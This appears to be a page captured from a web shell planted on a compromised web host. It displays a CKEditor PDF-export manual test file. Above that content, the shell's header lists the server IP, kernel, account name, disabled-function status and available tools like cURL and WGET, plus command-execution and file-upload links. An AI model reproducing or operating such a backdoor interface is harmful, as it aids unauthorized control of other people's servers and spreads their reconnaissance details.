Server IP : 162.214.80.37 / Your IP : 216.73.216.184 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/imyrqtmy/public_html/advocate/admin/ckeditor/plugins/exportpdf/tests/manual/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<h2>Classic Editor</h2> <textarea id="editor1"> <span class="badge badge-success">Classic Editor</span> </textarea> <h2>Divarea Editor</h2> <div id="editor2"> <span class="badge badge-success">Divarea Editor</span> </div> <h2>Inline Editor</h2> <div id="editor3" contenteditable="true"> <span class="badge badge-success">Inline Editor</span> </div> <script> exportPdfUtils.initManualTest(); CKEDITOR.replace( 'editor1', exportPdfUtils.getDefaultConfig( 'manual', { exportPdf_stylesheets: [ 'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' ], extraPlugins: 'wysiwygarea,exportpdf', allowedContent: true } ) ); CKEDITOR.replace( 'editor2', exportPdfUtils.getDefaultConfig( 'manual', { exportPdf_stylesheets: [ 'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' ], extraPlugins: 'divarea,exportpdf', allowedContent: true } ) ); CKEDITOR.inline( 'editor3', exportPdfUtils.getDefaultConfig( 'manual', { exportPdf_stylesheets: [ 'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' ], extraPlugins: 'floatingspace,exportpdf', allowedContent: true } ) ); </script>